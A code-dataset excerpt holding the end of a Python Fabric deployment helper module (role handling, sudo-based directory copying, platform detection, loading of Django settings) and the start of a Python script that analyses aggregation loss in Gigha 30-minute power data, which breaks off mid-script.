execute_or_not(task, *args, **kwargs):\n \"\"\" Run Fabric's execute(), but only if there are hosts/roles to run it on.\n Else, just discard the task, and print a warning message.\n\n This allows to have empty roles/hosts lists for some tasks, in\n architectures where all roles are not needed.\n\n .. note:: if you would like to have many services on the same host\n (eg. 
a worker_high and a worker_low, with 2 different\n configurations), you should call execute_or_not() once at a\n time for each role, not one time with all roles grouped in a\n list parameter. See `sparks.django.fabfile.restart_services()`\n for an example. **This is a limitation of the sparks model**.\n\n .. versionadded: 2.x.\n \"\"\"\n\n # execute kwargs: host, hosts, role, roles and exclude_hosts\n\n # LOGGER.debug(u'ROLEDEFS AT execute_or_not(): %s', env.roledefs)\n\n roles = kwargs.pop('sparks_roles', ['__all__'])\n non_empty = non_empty_roles(roles)\n\n # If execute_or_not() is called without `sparks_roles`, there is a\n # chance the user picked some roles / hosts manually with “R:” / “H:”\n # fabric pseudo-tasks. In this case, pick them on-the-fly, else we\n # won't have any host to run on, while in fact the user has selected\n # some.\n if not non_empty and roles == ['__all__'] \\\n and getattr(env, 'roles_picked', False) \\\n or getattr(env, 'hosts_picked', False):\n non_empty = non_empty_roles(env.roledefs.keys())\n\n LOGGER.debug(u'Running task %s on roles: %s, current_context: %s, '\n u'matching: %s',\n task.func_name if hasattr(task, 'func_name') else task,\n roles, non_empty, env.roledefs.get(roles[0], []))\n\n # Reset in case. The role should be found preferably in\n # env.host_string.role, but in ONE case (when running sparks\n # tasks on single hosts with -H), Fabric will set it to None\n # and will reset all other attributes (thus we can't use\n # env.host_string.sparks_role for example) and we still\n # need our tasks to figure out the machine's role.\n env.sparks_current_role = None\n\n if env.host_string:\n if non_empty:\n\n should_run = False\n\n for role in non_empty:\n if env.host_string in env.roledefs[role]:\n should_run = True\n\n if not hasattr(env.host_string, 'role') \\\n or env.host_string.role is None:\n # Supposing we are running via -H, populate the role\n # manually in a dedicated attribute. Fabric's execute\n # will reset env.host_string, and it's legitimate if\n # only -H is given on CLI.\n env.sparks_current_role = role\n\n # No need to look further.\n break\n\n if should_run:\n # If the user manually specified a host string / list,\n # we must not add superfluous roles / machines.\n\n LOGGER.debug(u'Multi-run mode: execute(%s, *%s, **%s) '\n u'with %s, %s and %s.', task, args, kwargs,\n env.host_string, env.hosts, env.roles)\n\n # NOTE: don't use Fabric's execute(), it duplicates tasks.\n return task(*args, **kwargs)\n\n else:\n LOGGER.debug('Not executing %s(%s, %s): host %s not '\n 'in current role(s) “%s”.',\n getattr(task, 'name', str(task)), args, kwargs,\n env.host_string, ', '.join(roles))\n else:\n LOGGER.debug('Not executing %s(%s, %s): no role(s) “%s” in '\n 'current context.', getattr(task, 'name', str(task)),\n args, kwargs, ', '.join(roles))\n\n else:\n if non_empty:\n kwargs['roles'] = non_empty\n\n LOGGER.debug(u'One-shot mode: execute(%s, *%s, **%s)',\n task, args, kwargs)\n\n return execute(task, *args, **kwargs)\n\n else:\n LOGGER.debug('Not executing %s(%s, %s): no role(s) “%s” in '\n 'current context.', getattr(task, 'name', str(task)),\n args, kwargs, ', '.join(roles))\n\n\ndef merge_roles_hosts(roledefs):\n \"\"\" Get an exhaustive list of all machines listed\n in the current ``env.roledefs``. 
\"\"\"\n\n merged = set()\n\n # LOGGER.debug(u'Roles to merge: %s', u', '.join(roledefs.keys()))\n\n for role in roledefs.keys():\n merged |= set(roledefs[role])\n\n # LOGGER.debug(u'Merged host list: %s', u', '.join(merged))\n\n return sorted(list(merged))\n\n\ndef set_roledefs_and_parallel(roledefs, parallel=False):\n \"\"\" Define a sparks-compatible but Fabric-happy ``env.roledefs``.\n It's just a shortcut to avoid doing the repetitive:\n\n env.roledefs = { … }\n # fill env.roledefs with empty lists for each unused roles.\n env.parallel = True\n env.pool_size = …\n\n Sparks has a default set of roles, already suited for clouded\n web projects. You do not need all of them in all your projects.\n Via this function, you can define only the one you need, and\n sparks will take care of making your ``roledefs`` compatible with\n Fabric, which wants all roles to be defined explicitely.\n\n Feel free to set :param:`parallel` to True, or any integer >= 1\n to enable the parallel mode. If set to ``True``, the function will\n count merged hosts and set parallel to this number. It defaults\n to ``False`` (no parallel execution).\n\n .. note:: the pool size is always clamped to 10 hosts to avoid making\n your machine and network suffer. If you ever would like to raise\n this maximum value, just set your shell environment\n variable ``SPARKS_PARALLEL_MAX`` to any integer value you want,\n and don't ever rant.\n\n .. versionadded:: new in version 2.0.\n\n .. versionchanged:: in version 2.1, this method was named\n after ``set_roledefs_and_roles_or_hosts``, but the whole process\n was still under design.\n \"\"\"\n\n maximum = int(os.environ.get('SPARKS_PARALLEL_MAX', 10))\n\n if maximum < 2:\n maximum = 10\n\n env.roledefs = roledefs\n\n # LOGGER.debug(u'Fabric roledefs set to: %s', env.roledefs)\n\n # pre-set empty roles with empty lists to avoid the beautiful:\n # Fatal error: The following specified roles do not exist:\n # worker\n existing_roles = env.roledefs.keys()\n\n for key in all_roles:\n # we do not use .setdefault()\n if key not in existing_roles:\n env.roledefs[key] = []\n\n # merge all hosts for tasks that can run on any of them.\n env.roledefs.update({\n '__all__': merge_roles_hosts(env.roledefs),\n })\n\n LOGGER.debug(u'set_roledefs_and_parallel(): role “__all__” includes %s',\n u', '.join(env.roledefs['__all__']))\n\n if parallel is True:\n env.parallel = True\n nbhosts = len(set(env.hosts))\n env.pool_size = maximum if nbhosts > maximum else nbhosts\n\n else:\n try:\n parallel = int(parallel)\n\n except:\n pass\n\n else:\n if parallel > 1:\n env.parallel = True\n env.pool_size = maximum if parallel > maximum else parallel\n\n # LOGGER.debug(u'ROLEDEFS AFTER set_roledefs_and_parallel(): %s',\n # env.roledefs)\n\n\ndef generate_random_name():\n return ''.join(\n random.choice(\n string.ascii_uppercase\n + string.digits\n + string.ascii_lowercase\n ) for x in range(10))\n\n\ndef get_current_role():\n \"\"\" Return the current role of the current host. Can be ``None`` if\n there is no role in current context. \"\"\"\n\n return getattr(env.host_string, 'role', None) or env.sparks_current_role\n\n\ndef worker_information_from_role(role):\n \"\"\" Return a tuple of two strings ``(worker_name, worker_queues)``, given\n the parameter :param:`role`. The tuple is simply taken from a\n corresponding table that you can customize\n in ``env.sparks_options['worker_information']``. If the role is not\n a worker one, 2 empty strings will be returned, eg. ``('', '')``.\n\n .. 
note:: be respectful when customizing, the current way of doing\n things is kind of weak. It works but it's not rock solid.\n\n .. versionadded:: 3.4\n \"\"\"\n\n if role in worker_roles:\n sparks_information = worker_information.copy()\n custom_information = env.sparks_options.get('worker_information', {})\n\n sparks_information.update(custom_information)\n\n info = sparks_information.get(role, None)\n\n if info is None:\n return role.title(), re.sub('[^\\w_]+', '',\n role.lower().replace('-', '_'))\n\n return info\n\n return '', ''\n\n\n# ================================================ general-purpose Fabric tasks\n\ntry:\n @task\n def get_dir_with_sudo(remote_path, local_path=None):\n\n with cd(remote_path):\n source_basename = os.path.basename(remote_path)\n\n print('Downloading {0}:{1}…'.format(env.host_string, remote_path),\n end='')\n sys.stdout.flush()\n\n save_file_name = '../{0}-copy-{1}.tar.gz'.format(\n source_basename, generate_random_name())\n while exists(save_file_name):\n save_file_name = '../{0}-copy-{1}.tar.gz'.format(\n source_basename, generate_random_name())\n\n # chmod will allow get() to succeed, provided the\n # user has correct access to full containing path…\n sudo(\"tar -czf '{0}' . ; chmod 644 '{0}'\".format(save_file_name),\n quiet=True)\n\n with hide('running', 'stdout', 'stderr'):\n downloaded = get(save_file_name, local_path)[0]\n\n sudo('rm -f \"{0}\"'.format(save_file_name), quiet=True)\n\n local_dirname, local_basename = downloaded.rsplit(os.sep, 1)\n\n local_full_name = os.path.join(local_dirname, source_basename)\n\n with lcd(local_dirname):\n with hide('running', 'stdout', 'stderr'):\n local('mkdir -p \"{0}\"'.format(source_basename))\n\n with lcd(source_basename):\n local('tar -xzf \"../{0}\"'.format(local_basename))\n\n local('rm -f \"{0}\"'.format(local_basename))\n\n print('into {1} directory.'.format(remote_path,\n local_full_name))\n\n return local_full_name\n\n @task\n def put_dir_with_sudo(local_path, remote_path):\n # TODO: implement remote_path=None & return remote_path\n\n with lcd(local_path):\n source_basename = os.path.basename(local_path)\n\n print('Uploading {0} to {1}:{2}…'.format(local_path,\n env.host_string, remote_path), end='')\n sys.stdout.flush()\n\n save_file_name = '../{0}-copy-{1}.tar.gz'.format(\n source_basename, generate_random_name())\n while os.path.exists(save_file_name):\n save_file_name = '../{0}-copy-{1}.tar.gz'.format(\n source_basename, generate_random_name())\n\n with hide('running', 'stdout', 'stderr'):\n local(\"tar -czf '{0}' . \".format(save_file_name))\n\n remote_dirname, remote_basename = remote_path.rsplit(os.sep, 1)\n\n with hide('running', 'stdout', 'stderr'):\n put(save_file_name, remote_dirname, use_sudo=True)\n local('rm -f \"{0}\"'.format(save_file_name))\n\n with cd(remote_dirname):\n with hide('running', 'stdout', 'stderr'):\n sudo('mkdir -p \"{0}\"'.format(remote_basename))\n\n with cd(remote_basename):\n sudo('tar -xzf \"{0}\"'.format(save_file_name))\n sudo('rm -f \"{0}\"'.format(save_file_name))\n\n print(' done.')\n\nexcept NameError:\n # Fabric is not yet installed. Don't crash. 
Happens during the first setup.\n pass\n\n\n# =================================================== Remote system information\n\ndef is_localhost(hostname):\n return hostname in ('localhost', 'localhost.localdomain',\n '127.0.0.1', '127.0.1.1', '::1')\n\n\ndef is_local_environment():\n\n is_local = env.environment == 'local' or (\n env.environment == 'test'\n and is_localhost(env.host_string))\n\n return is_local\n\n\ndef is_development_environment():\n\n is_development = (is_local_environment()\n or env.environment in ('test', 'development', 'preview'))\n\n return is_development\n\n\ndef is_production_environment():\n\n is_production = (not is_development_environment()\n and env.environment in ('production', 'real'))\n\n return is_production\n\n\nclass ConfigurationMixin(object):\n \"\"\" Common methods to Remote & Local configuration classes. \"\"\"\n\n def __getattr__(self, key):\n \"\"\" This lazy getter will allow to load the Django settings after\n Fabric and the project fabfile has initialized `env`. Doing\n elseway leads to cycle dependancy KeyErrors. \"\"\"\n\n if key == 'django_settings':\n try:\n self.get_django_settings()\n\n except ImportError:\n raise AttributeError(u'%s Django settings could not be '\n u'loaded.' % ('Remote' if 'Remote'\n in self.__class__.__name__\n else 'Local'))\n\n return self.django_settings\n\n @property\n def is_osx(self):\n return self.mac is not None\n\n @property\n def is_arch(self):\n return self.lsb and self.lsb.ID == 'arch'\n\n @property\n def is_bsd(self):\n return self.bsd is not None\n\n @property\n def is_freebsd(self):\n return self.bsd and self.bsd.ID == 'FreeBSD'\n\n @property\n def is_ubuntu(self):\n return self.lsb and self.lsb.ID.lower() == 'ubuntu'\n\n @property\n def is_debian(self):\n return self.lsb and self.lsb.ID.lower() == 'debian'\n\n @property\n def is_deb(self):\n return self.lsb and self.lsb.ID.lower() in ('ubuntu', 'debian',)\n\n @property\n def release_formatted(self):\n\n if self.mac:\n return u'Apple OSX {0}'.format(self.mac.release)\n\n if self.lsb:\n return u'{0} {1}'.format(self.lsb.ID.title(), self.lsb.RELEASE)\n\n if self.bsd:\n return u'{0} {1}'.format(self.bsd.ID, self.bsd.RELEASE)\n\n @property\n def vm_formatted(self):\n return ('VMWare '\n if self.is_vmware\n else 'Parallels '\n ) if self.is_vm else ''\n\n\nclass RemoteConfiguration(ConfigurationMixin):\n \"\"\" Define an easy to use object with remote machine configuration. \"\"\"\n\n def __init__(self, host_string):\n\n self.host_string = host_string\n\n # No need to `deactivate` for this calls, it's pure shell.\n self.user, self.tilde = run('echo \"${USER},${HOME}\"',\n quiet=not DEBUG).strip().split(',')\n\n self.get_platform()\n self.get_uname()\n self.get_virtual_machine()\n\n if not QUIET:\n print('Remote is {release} {host} {vm}{arch}, user '\n '{user} in {home}.'.format(\n release=self.release_formatted,\n host=cyan(self.uname.nodename),\n vm=self.vm_formatted,\n arch=self.uname.machine,\n user=cyan(self.user),\n home=self.tilde,\n ))\n\n def reload(self):\n \"\"\" This methods just reloads the remote Django settings, because\n anything else is very unlikely to have changed. 
\"\"\"\n\n self.get_django_settings()\n\n def get_platform(self):\n # Be sure we don't get stuck in a virtualenv for free.\n with prefix('deactivate >/dev/null 2>&1 || true'):\n out = run(\"python -c 'from __future__ import print_function; \"\n \"import platform; \"\n \"print(platform.system())'\",\n quiet=not DEBUG, combine_stderr=False)\n\n self.lsb = None\n self.mac = None\n self.bsd = None\n\n out = out.strip().lower()\n\n if out == u'linux':\n distro = run(\"python -c 'from __future__ import print_function; \"\n \"import platform; \"\n \"print(\\\",\\\".join(platform.linux_distribution()))'\",\n quiet=not DEBUG,\n combine_stderr=False).strip().split(',')\n\n if distro[0].lower() in ('debian', 'ubuntu'):\n\n self.lsb = SimpleObject()\n self.lsb.ID = distro[0]\n self.lsb.RELEASE = distro[1]\n self.lsb.CODENAME = distro[2]\n\n elif distro[0].lower() == 'arch' or (\n distro == ('', '', '')\n and 'ARCH' in platform.platform()):\n # http://bugs.python.org/issue12214\n # is implemented only for Python 3.3+.\n self.lsb = SimpleObject()\n self.lsb.ID = 'arch'\n self.lsb.RELEASE = platform.release()\n self.lsb.CODENAME = 'ArchLinux'\n\n else:\n raise RuntimeError(u'Unsupported Linux distro {1} on {0}, '\n u'please get in touch with 1flow/sparks '\n u'developers.'.format(\n self.host_string, distro[0]))\n\n elif out == u'darwin':\n\n # Be sure we don't get stuck in a virtualenv for free.\n with prefix('deactivate >/dev/null 2>&1 || true'):\n out = run(\"python -c 'from __future__ import print_function; \"\n \"import platform; \"\n \"print(platform.mac_ver())'\", quiet=not DEBUG,\n combine_stderr=False)\n\n try:\n for line in out.splitlines():\n if line.startswith(\"('\"):\n self.mac = SimpleObject(from_dict=dict(zip(\n ('release', 'version',\n 'machine'),\n ast.literal_eval(line))))\n break\n\n except SyntaxError:\n # something went very wrong,\n # none of the detection methods worked.\n raise RuntimeError(u'Cannot determine platform of {0}, '\n u'platform.mac_ver() reported nothing '\n u'usable:\\n{1}'.format(self.host_string,\n out))\n else:\n if self.mac is None:\n raise RuntimeError(u'Cannot determine platform of {0}, '\n u'platform.mac_ver() reported nothing '\n u'usable:\\n{1}'.format(self.host_string,\n out))\n\n elif out == u'freebsd':\n release = run(\"python -c 'from __future__ import print_function; \"\n \"import platform; \"\n \"print(platform.release())'\",\n quiet=not DEBUG,\n combine_stderr=False).strip()\n\n self.bsd = SimpleObject()\n self.bsd.ID = 'FreeBSD'\n self.bsd.RELEASE = release\n self.bsd.VERSION = release.split('-')[0]\n self.bsd.MAJOR = int(self.bsd.VERSION.split('.')[0])\n self.bsd.MINOR = int(self.bsd.VERSION.split('.')[1])\n\n else:\n raise RuntimeError(u'Unsupported platform {1} on {0}, please '\n u'get in touch with 1flow/sparks '\n u'developers.'.format(self.host_string, out))\n\n def get_uname(self):\n # Be sure we don't get stuck in a virtualenv for free.\n with prefix('deactivate >/dev/null 2>&1 || true'):\n out = run(\"python -c 'from __future__ import print_function; \"\n \"import os; print(os.uname())'\",\n quiet=not DEBUG, combine_stderr=False)\n\n self.uname = None\n\n for line in out.splitlines():\n if line.startswith(\"('\"):\n self.uname = SimpleObject(from_dict=dict(zip(\n ('sysname', 'nodename', 'release',\n 'version', 'machine'),\n ast.literal_eval(line))))\n break\n\n # Python 3.x (tested on ArchLinux 20140826)\n if line.startswith(\"posix.uname_result(\"):\n self.uname = SimpleObject(from_dict=ast.literal_eval(\n 'dict' + line[18:]))\n break\n\n 
if self.uname is None:\n raise RuntimeError(u'cannot determine uname of {0}, '\n u'os.uname() reported nothing usable:\\n'\n u'{1}'.format(self.host_string, out))\n\n self.hostname = self.uname.nodename\n\n def get_virtual_machine(self):\n # TODO: implement me (and under OSX too).\n self.is_vmware = False\n\n # NOTE: this test could fail in VMs where nothing is mounted from\n # the host. In my own configs, this never occurs, but who knows.\n # TODO: check this works under OSX too, or enhance the test.\n self.is_parallel = run('mount | grep prl_fs', quiet=not DEBUG,\n warn_only=True, combine_stderr=False).succeeded\n\n self.is_vm = self.is_parallel or self.is_vmware\n\n def get_django_settings(self):\n\n # transform the supervisor syntax to shell syntax.\n env_generic = ' '.join(env.environment_vars) \\\n if hasattr(env, 'environment_vars') else ''\n\n env_sparks = (' SPARKS_DJANGO_SETTINGS={0}'.format(\n env.sparks_djsettings)) \\\n if hasattr(env, 'sparks_djsettings') else ''\n\n env_django_settings = \\\n ' DJANGO_SETTINGS_MODULE=\"{0}.settings\"'.format(env.project)\n\n # Here, we *NEED* to be in the virtualenv, to get the django code.\n # NOTE: this code is kind of weak, it will fail if settings include\n # complex objects, but we hope it's not.\n\n prefix_cmd = 'workon {0}'.format(env.virtualenv) \\\n if hasattr(env, 'virtualenv') else ''\n\n pickled_settings = StringIO.StringIO()\n\n with prefix(prefix_cmd):\n with cd(env.root if hasattr(env, 'root') else ''):\n # NOTE: this doesn't work with “ with open(…) as f: ”, even\n # though I would have greatly prefered this modern version…\n out = run((\"{0}{1}{2} python -c 'import cPickle as pickle; \"\n \"from django.conf import settings; \"\n \"settings._setup(); \"\n \"f=open(\\\"__django_settings__.pickle\\\", \"\n \"\\\"w\\\"); pickle.dump(settings._wrapped, f, \"\n \"pickle.HIGHEST_PROTOCOL); f.close()'\").format(\n env_generic, env_sparks, env_django_settings),\n quiet=not DEBUG, warn_only=True, combine_stderr=False)\n\n if out.succeeded:\n get('__django_settings__.pickle',\n pickled_settings)\n run('rm -f __django_settings__.pickle',\n quiet=not DEBUG)\n\n try:\n self.django_settings = pickle.loads(\n pickled_settings.getvalue())\n\n except:\n LOGGER.exception('Cannot load remote django settings!')\n\n pickled_settings.close()\n\n else:\n LOGGER.warning(('Could not load remote Django settings '\n 'for project \"{0}\" (which should be '\n 'located in \"{1}\", with env. {2}{3}'\n ')').format(\n env.project,\n env.root if hasattr(env, 'root') else '~',\n env_generic, env_sparks))\n raise ImportError\n\n\nclass LocalConfiguration(ConfigurationMixin):\n \"\"\" Define an easy to use object with local machine configuration.\n\n This class doesn't use fabric, it's used to bootstrap the local\n machine when it's empty and doesn't have fabric installed yet.\n\n .. 
warning:: this class won't probably play well in a virtualenv.\n Unlike the :class:`RemoteConfiguration` class, I don't think\n it's pertinent and wanted to :program:`deactivate` first.\n \"\"\"\n def __init__(self, host_string=None):\n\n self.host_string = host_string or 'localhost'\n\n system = platform.system().lower()\n\n self.lsb = None\n self.mac = None\n self.bsd = None\n\n if system == 'linux':\n distro = platform.linux_distribution()\n\n if distro[0].lower() in ('debian', 'ubuntu'):\n self.lsb = SimpleObject()\n self.lsb.ID = distro[0]\n self.lsb.RELEASE = distro[1]\n self.lsb.CODENAME = distro[2]\n\n elif distro[0].lower() == 'arch' or (\n distro == ('', '', '') and 'ARCH' in platform.platform()):\n # http://bugs.python.org/issue12214\n # is implemented only for Python 3.3+.\n self.lsb = SimpleObject()\n self.lsb.ID = 'arch'\n self.lsb.RELEASE = platform.release()\n self.lsb.CODENAME = 'ArchLinux'\n\n else:\n raise RuntimeError(u'Unsupported Linux distro {1} on '\n u'localhost, please get in touch with '\n u'1flow/sparks developers.'.format(\n distro[0]))\n\n elif system == 'darwin':\n self.mac = SimpleObject(from_dict=dict(zip(\n ('release', 'version', 'machine'),\n platform.mac_ver())))\n\n elif system == u'freebsd':\n release = platform.release()\n\n self.bsd = SimpleObject()\n self.bsd.ID = 'FreeBSD'\n self.bsd.RELEASE = release\n self.bsd.VERSION = release.split('-')[0]\n self.bsd.MAJOR = int(self.bsd.VERSION.split('.')[0])\n self.bsd.MINOR = int(self.bsd.VERSION.split('.')[1])\n\n else:\n raise RuntimeError(u'Unsupported platform {0} on localhost, '\n u'please get in touch with 1flow/sparks '\n u'developers.'.format(system))\n\n self.uname = SimpleObject(from_dict=dict(zip(\n ('sysname', 'nodename', 'release',\n 'version', 'machine'),\n os.uname())))\n\n self.hostname = self.uname.nodename\n\n self.user, self.tilde = nofabric.local('echo \"${USER},${HOME}\"',\n ).strip().split(',')\n\n # TODO: implement me (and under OSX too).\n self.is_vmware = False\n\n # NOTE: this test could fail in VMs where nothing is mounted from\n # the host. In my own configs, this never occurs, but who knows.\n # TODO: check this works under OSX too, or enhance the test.\n self.is_parallel = nofabric.local('mount | grep prl_fs').succeeded\n\n self.is_vm = self.is_parallel or self.is_vmware\n\n def __getattr__(self, key):\n \"\"\" This lazy getter will allow to load the Django settings after\n Fabric and the project fabfile has initialized `env`. Doing\n elseway leads to cycle dependancy KeyErrors. \"\"\"\n\n if key == 'django_settings':\n try:\n self.get_django_settings()\n\n except ImportError:\n raise AttributeError(\n 'Local Django settings could not be loaded.')\n\n return self.django_settings\n\n def get_django_settings(self):\n\n # Set the environment exactly how it should be for runserver.\n # Supervisor environment can hold the sparks settings,\n # while Django environment will hold the project settings.\n\n if hasattr(env, 'environment_vars'):\n for env_var in env.environment_vars:\n name, value = env_var.strip().split('=')\n os.environ[name] = value\n\n if hasattr(env, 'sparks_djsettings'):\n os.environ['SPARKS_DJANGO_SETTINGS'] = env.sparks_djsettings\n\n os.environ['DJANGO_SETTINGS_MODULE'] = \\\n '{0}.settings'.format(env.project)\n\n # Insert the $CWD in sys path, and pray for the user to have called\n # `fab` from where `manage.py` is. 
This is the way it should be done\n        # but who knows…\n        current_root = env.root if (hasattr(env, 'root')\n                                    and is_local_environment()) else os.getcwd()\n        sys.path.append(current_root)\n\n        try:\n            from django.conf import settings as django_settings\n            # Prevent Django from (re-)configuring our own logging;\n            # the Fabric output becomes a mess without this.\n            django_settings.__class__._configure_logging = lambda x: None\n\n            django_settings._setup()\n\n        except ImportError:\n            LOGGER.warning(('Django settings could not be loaded for '\n                            'project \"{0}\" (which should be '\n                            'located in \"{1}\", with env. {2}{3}'\n                            ')').format(\n                env.project,\n                current_root,\n                'SPARKS_DJANGO_SETTINGS={0}'.format(\n                    env.sparks_djsettings)\n                if hasattr(env, 'sparks_djsettings') else '',\n                ' '.join(env.environment_vars)\n                if hasattr(env, 'environment_vars') else ''))\n            raise\n        else:\n            self.django_settings = django_settings._wrapped\n\n        finally:\n            sys.path.remove(current_root)\n\n            del os.environ['DJANGO_SETTINGS_MODULE']\n\n            if hasattr(env, 'sparks_djsettings'):\n                del os.environ['SPARKS_DJANGO_SETTINGS']\n\n            if hasattr(env, 'environment_vars'):\n                for env_var in env.environment_vars:\n                    # re-parse the variable name; `name` would otherwise be\n                    # stale from the setup loop above.\n                    name, value = env_var.strip().split('=')\n                    del os.environ[name]\n\n\ndef with_remote_configuration(func):\n\n    @functools.wraps(func)\n    def wrapped(*args, **kwargs):\n        global remote_configuration\n        if remote_configuration is None:\n            try:\n                remote_configuration = find_configuration_type(env.host_string)\n            except NameError:\n                # no 'env', probably running from 1nstall.\n                remote_configuration = find_configuration_type('localhost')\n\n        elif remote_configuration.host_string != env.host_string:\n            # host changed: fabric is running the same task on another host.\n            remote_configuration = find_configuration_type(env.host_string)\n\n        # Insert remote_configuration directly in kwargs.\n        # This avoids the following error:\n        #       TypeError: XXX() got multiple values\n        #       for keyword argument 'remote_configuration'\n        # at the price of some overwriting. 
We just hope that no-one\n        # will have the bad idea of naming his KWargs the same.\n        kwargs['remote_configuration'] = remote_configuration\n\n        return func(*args, **kwargs)\n\n    return wrapped\n\n\ndef with_local_configuration(func):\n\n    @functools.wraps(func)\n    def wrapped(*args, **kwargs):\n        global local_configuration\n        if local_configuration is None:\n            local_configuration = LocalConfiguration()\n\n        return func(*args, local_configuration=local_configuration, **kwargs)\n\n    return wrapped\n\n\ndef find_configuration_type(hostname):\n\n    if is_localhost(hostname):\n        return LocalConfiguration()\n\n    else:\n        return RemoteConfiguration(hostname)\n\n\nif os.environ.get('SPARKS_PARAMIKO_VERBOSE', False):\n    paramiko_logging_level = logging.WARNING\nelse:\n    # but please, no paramiko, it's just flooding my terminal.\n    paramiko_logging_level = logging.ERROR\n\nif DEBUG:\n    sparks_logging_level = logging.DEBUG\n\nelif QUIET:\n    sparks_logging_level = logging.WARNING\n\nelse:\n    sparks_logging_level = logging.INFO\n\nlogging.basicConfig(\n    format='%(asctime)s %(name)s[%(levelname)s] %(message)s',\n    level=sparks_logging_level\n)\nlogging.getLogger('paramiko').setLevel(paramiko_logging_level)\n\nif local_configuration is None:\n    local_configuration = LocalConfiguration()\n","sub_path":"sparks/fabric/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":39782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"147832790","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Feb 11 11:17:46 2020\n\n@author: Chae Gordon\n\"\"\"\n\"\"\"\nThe aim of this code is to calculate the probable value for loss occurring from\naggregation on a monthly scale.\n\nTo save on computing time, the plan is to first calculate the loss due to\naggregation compared with 30 min data --> then apply the 14% from\nprevious analysis.\n\nThen we can look at interpolating entire months (longer compute time)\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport math\nimport matplotlib.pyplot as plt\n\nthrottle_a = []\nloss_a = []\nenergy_vio_a = []\n\nsigma = 0.03 \n\n# 30 min period\n\nmonth = 48*(365/12)\nyear = 48*365\np_to_E_conv = 1/2\n\ndf_2 = (1/p_to_E_conv)*pd.read_excel(\"Gigha_data_30_min.xlsx\").values\n\n# transform 48 30 min rows into a time series\n\npower = []\nfor i in range(len(df_2)):\n    for j in range(48):\n        power.append(df_2[i,j+2])\n    \n\ndf = pd.DataFrame(data=power, columns=[\"Average Power/ kW\"])\n\npower_split_m = np.array_split(df.values, math.ceil(len(df)/month)) # split into months\n\npower_agg_m = np.array([sum(i) for i in power_split_m]) # aggregate the months\n\n\"\"\"Want to calculate utilisation from this & from the agg. value and compare\"\"\"\n\n# need list comps like this --> for it to work\ntest_logic = [i if i <= np.average(power_agg_m) else np.average(power_agg_m) for i in power_agg_m]\n\n\nagg_useable_energy = sum([i if i <= np.average(power_agg_m) else np.average(power_agg_m) for i in power_agg_m])\nmax_useable_energy = (len(power_agg_m)*np.average(power_agg_m))\nagg_utilisation = agg_useable_energy/max_useable_energy\n\n# the loss is high but this is partly a sizing issue, can get to ca. 
21% error with 1.5 times sizing\n# going to need to run sizing algorithm\n\n\nacc_useable_energy = sum([i if i <= 1.5*np.average(power_agg_m)/month else 1.5*np.average(power_agg_m)/month for i in df.values])\nacc_utilisation = acc_useable_energy/max_useable_energy\n\nutil_error = acc_utilisation - agg_utilisation\ntotal_agg_spill = abs(util_error)+(1-abs(util_error))*0.14\nprint(\"util error\", util_error)\n\nprint(\"total spill then\",total_agg_spill)\n\n# avoiding the fact that don't have all 5 years use [] in the arguments\n\n\"\"\"\n# rounds years up\n\ncounter = [math.ceil(len(df)/year) -1 if math.ceil(len(df)/year) > 1 else 0][0]\n\nlisty = [(i+1)*year for i in range(counter)]\n\npower_split_y = np.array_split(df.values, listy) # split into years\n\npower_agg_y = np.array([sum(i) for i in power_split_y]) # aggregate into years\n\n# only inlcuding complete years\n\n# p_to_E_conv to convert power to energy (kWh)\nif counter == 0:\n yearly_figures = (p_to_E_conv)*power_agg_y[:]\n monthly_figures = (p_to_E_conv)*power_agg_m[:]\nelse:\n yearly_figures = (p_to_E_conv)*power_agg_y[:counter]\n monthly_figures = (p_to_E_conv)*power_agg_m[:counter*12]\n \n \n# want to take the 30 minute power data and interpolate into 1-minute data\n \n# normalising data into fractional values of total rated power\n \npower = df[\"Average Power/ kW\"]\n \nmax_power = df[\"Average Power/ kW\"].max() \n\npower_split = np.array_split(power.values, int(len(power)/24)) # split into 12 hrs\n\npower_agg = np.array([sum(i) for i in power_split]) # aggregate the 12 hours\n\nsigma_12 = np.std(power_agg/max(power_agg))\n\npower = df[\"Average Power/ kW\"]/max_power\n\npower = power.values\n\nprint(sigma_12)\n\nloss_at_load_factor = 0\n\nfor i in range(1):\n throttle = 1 # i*(0.1) # just want to analyse the case of box @ l.f\n \n interpolated = []\n \n load = throttle*np.average(power)\n \n # if 30 minute data change 10--> 30\n # energy should remain unaffected\n \n lossy = []\n avg_line = []\n \n for i in range(len(power)-29):\n for j in range(30):\n avg_line.append(power[i])\n # have it so random fluctuation is centred on previous point\n a = power[i+j] + np.random.normal(loc=0,scale=sigma) \n if a > 0:\n if 1 > a:\n interpolated.append(a)\n if power[i]>load:\n if a < load:\n lossy.append((load-a)*(1/60))\n else:\n lossy.append(0)\n if load >= power[i]:\n if a > load:\n lossy.append((1/60)*(a - load))\n else:\n lossy.append(0)\n else:\n a=1\n interpolated.append(a)\n if power[i]>load:\n if a < load:\n lossy.append((load-a)*(1/60))\n else:\n lossy.append(0)\n if load >= power[i]:\n if a > load:\n lossy.append((1/60)*(a - load))\n else:\n lossy.append(0)\n \n else:\n interpolated.append(0)\n lossy.append(0)\n \n lost_E = sum(lossy)*max_power # kWh\n print(\"lost Energy: {0:.2f} kWh\".format(lost_E))\n # checking energy conservation\n \n energy_interpolated = sum(interpolated)*(1/60)*max_power # kWh\n energy_data = (1/2)*sum(power)*max_power # kWh\n \n print(\"lost Energy: {0:.2f} %\".format(100*lost_E/energy_data))\n print(\"Energy Conservation Violated by {0:.2f} %\".format(100*(energy_interpolated-energy_data)/(energy_data)))\n \n throttle_a.append(throttle)\n loss_a.append(100*lost_E/energy_data)\n energy_vio_a.append(100*(energy_interpolated-energy_data)/(energy_data))\n \n if throttle == 1:\n power_g = power[0:3]\n interpolated_g = interpolated[0:61] # check this\n avg_line_g = avg_line[0:61]\n \n loss_at_load_factor = 100*lost_E/energy_data # loss when IT sized at average power\n \n plt.figure()\n 
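# (Comment added: the figure below overlays the 1-minute interpolated series,\n # the 30-minute step average, and the original data points, as a visual\n # check that interpolation preserves the average power.)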
